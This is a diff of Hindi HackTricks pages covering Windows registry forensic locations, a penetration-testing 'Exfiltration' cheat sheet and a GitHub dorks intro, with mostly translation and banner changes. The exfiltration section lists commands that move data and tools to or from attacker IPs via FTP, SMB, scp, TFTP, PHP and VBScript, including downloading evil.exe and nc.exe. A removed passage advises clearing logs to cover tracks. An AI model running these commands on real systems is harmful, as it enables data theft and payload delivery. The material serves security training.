**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -2,20 +2,20 @@
### दिलचस्प Windows रजिस्ट्री कुंजी ### दिलचस्प Windows रजिस्ट्री कुंजी
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
### **Windows संस्करण और मालिक जानकारी** ### **Windows संस्करण और मालिक जानकारी**
- **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा। - **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा।
@ -24,14 +24,14 @@ HackTricks का समर्थन करने के अन्य तरी
- होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है। - होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है।
### **समय क्षेत्र सेटिंग** ### **समय क्षेत्र सेटिंग**
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है। - सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है।
### **पहुंच समय ट्रैकिंग** ### **पहुंच समय ट्रैकिंग**
- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें: - डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें:
`fsutil behavior set disablelastaccess 0` `fsutil behavior set disablelastaccess 0`
### Windows संस्करण और सेवा पैक ### Windows संस्करण और सेवा पैक
- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं। - **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं।
### अंतिम पहुंच समय सक्षम करना ### अंतिम पहुंच समय सक्षम करना
- अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है। - अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है।
@ -40,29 +40,29 @@ HackTricks का समर्थन करने के अन्य तरी
- रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं। - रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं।
### क्लाइंट साइड कैशिंग (CSC) ### क्लाइंट साइड कैशिंग (CSC)
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो - **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर ऐसे वातावरणों में जिनमें अंतरिक्षिक संयोजन है
### ऑटोस्टार्ट प्रोग्राम ### ऑटोस्टार्ट प्रोग्राम
- विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं। - विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं।
### शेलबैग्स ### शेलबैग्स
- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए। - **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
### USB जानकारी और फोरेंसिक्स ### USB सूचना और फोरेंसिक्स
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं। - USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं।
### वॉल्यूम सीरियल नंबर ### वॉल्यूम सीरियल नंबर
- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है। - **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्थान स्थापित करने की आवश्यकता होती है।
### **शटडाउन विवरण** ### **शटडाउन विवरण**
- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं। - शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखी जाती हैं।
### **नेटवर्क कॉन्फ़िगरेशन** ### **नेटवर्क कॉन्फ़िगरेशन**
- विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें। - विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें।
- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**। - पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं
### **साझा फोल्डर** ### **साझा फोल्डर**
- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं। - साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
### **स्वचालित रूप से शुरू होने वाले प्रोग्राम** ### **स्वचालित रूप से शुरू होने वाले प्रोग्राम**
- पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं। - पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं।
@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी
### **खोजें और टंकित पथ** ### **खोजें और टंकित पथ**
- एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए। - एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए।
### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें** ### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें**
- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में। - हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
### **हाल ही में उपयोग किए गए (MRU) आइटम** ### **हाल ही में उपयोग किए गए (MRU) आइटम**
- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं। - MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहत होती हैं।
### **उपयोगकर्ता गतिविधि ट्रैकिंग** ### **उपयोगकर्ता गतिविधि ट्रैकिंग**
- उपयोगकर्ताहायत - यूज़र असिस्ट फ़ीचर विस्तृत एप्लिकेशन उपयोग स

View file

@ -1,39 +1,40 @@
# Exfiltration # Exfiltration
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**Try Hard Security Group** **Try Hard सिक्योरिटी ग्रुप**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
*** ***
## सूचीबद्ध डोमेन्स जिन्हें सूचना निकालने के लिए सफेद सूची में शामिल किया गया है ## सामान्यत: व्हाइटलिस्टेड डोमेन्स जिनसे सूचना निकाली जा सकती है
[https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्य व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है [https://lots-project.com/](https://lots-project.com/) पर जांच करें कि कौन से सामान्यत: व्हाइटलिस्टेड डोमेन्स का दुरुपयोग किया जा सकता है
## कॉपी और पेस्ट बेस64 ## कॉपी\&पेस्ट बेस64
**Linux** **लिनक्स**
```bash ```bash
base64 -w0 <file> #Encode file base64 -w0 <file> #Encode file
base64 -d file #Decode file base64 -d file #Decode file
``` ```
**Windows** **विंडोज**
``` ```
certutil -encode payload.dll payload.b64 certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll certutil -decode payload.b64 payload.dll
@ -150,7 +151,7 @@ mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart /etc/init.d/pure-ftpd restart
``` ```
### **Windows** क्लाइंट ### **Windows** ग्राहक
```bash ```bash
#Work well with python. With pure-ftp use fusr:ftp #Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt echo open 10.11.0.41 21 > ftp.txt
@ -163,7 +164,7 @@ ftp -n -v -s:ftp.txt
``` ```
## SMB ## SMB
काली को सर्वर के रूप में उपयोग करें काली को सर्वर के रूप में
```bash ```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
@ -185,23 +186,7 @@ guest ok = Yes
#Start samba #Start samba
service smbd restart service smbd restart
``` ```
### Exfiltration Techniques on Windows Windows के लिए एक्सफिल्ट्रेशन
#### Local Exfiltration
Local exfiltration techniques involve transferring data to devices within the local network or physically removing data from the target environment.
#### Remote Exfiltration
Remote exfiltration techniques involve transferring data to an external location outside the target network, typically controlled by the attacker.
#### Exfiltration Tools
Various tools can be used for exfiltration, such as **Netcat**, **FTP**, **PowerShell**, **BITSAdmin**, and **certutil**.
#### Covering Tracks
After exfiltrating data, it's essential to cover tracks by deleting logs, clearing event logs, and removing any evidence of the exfiltration activity.
```bash ```bash
CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
@ -211,7 +196,7 @@ WindPS-2> cd new_disk:
``` ```
## SCP ## SCP
हमलावर को SSHd चलाना होगा हमलावर को SSHd चल रहा होना चाहिए
```bash ```bash
scp <username>@<Attacker_IP>:<directory>/<filename> scp <username>@<Attacker_IP>:<directory>/<filename>
``` ```
@ -264,7 +249,7 @@ sniff(iface="tun0", prn=process_packet)
``` ```
## **SMTP** ## **SMTP**
यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप Python के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं: यदि आप एक SMTP सर्वर को डेटा भेज सकते हैं, तो आप पायथन के साथ डेटा प्राप्त करने के लिए एक SMTP बना सकते हैं:
```bash ```bash
sudo python -m smtpd -n -c DebuggingServer :25 sudo python -m smtpd -n -c DebuggingServer :25
``` ```
@ -290,13 +275,11 @@ tftp -i <KALI-IP> get nc.exe
``` ```
## PHP ## PHP
PHP के एक लाइनर के साथ एक फ़ाइल डाउनलोड करें: PHP वनलाइनर के साथ एक फ़ाइल डाउनलोड करें:
```bash ```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
``` ```
## VBScript ## VBScript
VBScript का उपयोग डेटा अन्य संगठनों में भेजने के लिए किया जा सकता है। VBScript को उपयोग करके डेटा को एक फ़ाइल में लिखा जा सकता है और फिर उस फ़ाइल को एक विदेशी सर्वर पर अपलोड किया जा सकता है।
```bash ```bash
Attacker> python -m SimpleHTTPServer 80 Attacker> python -m SimpleHTTPServer 80
``` ```
@ -334,7 +317,7 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
``` ```
## डीबग.एक्सई ## डीबग.एक्सई
`डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी बाइट के फ़ाइलों को एकत्रित करने की सीमा है**। `डीबग.एक्सई` प्रोग्राम न केवल बाइनरी की जांच की अनुमति देता है बल्कि **हेक्स से उन्हें पुनः निर्माण करने की क्षमता भी है**। इसका मतलब है कि एक बाइनरी के हेक्स प्रदान करके, `डीबग.एक्सई` बाइनरी फ़ाइल उत्पन्न कर सकता है। हालांकि, यह महत्वपूर्ण है कि डीबग.एक्सई का एक **सीमितांकन है जो 64 केबी के आकार तक फ़ाइलों को आसेंबल करने की है**।
```bash ```bash
# Reduce the size # Reduce the size
upx -9 nc.exe upx -9 nc.exe
@ -346,20 +329,21 @@ wine exe2bat.exe nc.exe nc.txt
**Try Hard Security Group** **Try Hard Security Group**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और **हैकट्रिक्स क्लाउड** github रेपो में PR जमा करके।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com)
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,31 +1,32 @@
# गिथब डोर्क्स और लीक्स # Github डोर्क्स और लीक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिथब रेपो में।
</details> </details>
{% endhint %}
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**बग बाउंटी टिप**: **साइन अप करें** इंटिग्रिटी के लिए, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप टू **$100,000** तक कमाना! **बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! आज हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का। अब जब हमने हमारे स्कोप की संपत्तियों की सूची बना ली है, तो अब समय है कुछ OSINT लो-हैंगिंग फलों की खोज करने का।
